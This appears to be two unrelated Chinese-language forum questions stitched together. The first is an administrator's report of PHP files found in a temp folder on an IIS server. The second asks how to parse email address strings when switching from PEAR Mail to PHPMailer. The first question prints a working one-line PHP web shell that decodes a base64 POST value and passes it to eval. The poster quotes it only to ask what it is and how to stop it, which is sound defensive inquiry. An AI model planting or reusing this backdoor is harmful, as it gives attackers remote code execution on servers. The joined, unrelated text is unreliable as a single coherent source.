我注意到我们的临时目录有许多看起来像临时文件的名字,如phpA3F9.tmp
查看内容我找到一个数字后跟一些PHP代码,以下代码出现在几个文件中
9990000
<?php
$mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>
这似乎是一次攻击尝试,但我认为它依赖于攻击者能够执行tmp文件夹中的代码.
谁能解释一下这里发生了什么?有什么风险?这些文件如何进入tmp文件夹?我怎么阻止他们?
我不知道它是否相关,但我们在IIS上运行PHP 5.5
我们一直在使用 PEAR Mail,但由于它已经有一段时间没有维护了,所以我想转换为 PHPmailer。我们有一个现有的电子邮件类,它包装了实际的邮件程序,因此到目前为止转换看起来并不太困难。
我遇到的问题是我们现有的 sendEmail 方法需要电子邮件地址作为字符串,例如
display name <address@domain.tld>, another display name <address2@domain.tld>
而 PHPmailer 依次获取每个地址并将地址和显示名称作为单独的参数传递,例如:
$mail->addAddress('address@domain.tld','display name');
我需要一个例程来解析旧式地址并将地址与显示名称分开;我可以写这个,但我不想重新发明轮子,而且我认为我不能成为第一个遇到这个问题的人(尽管我的搜索未能找到现有的解决方案)。
谁能指出我现有的解决方案吗?
编辑是因为我颠倒了显示名称详细信息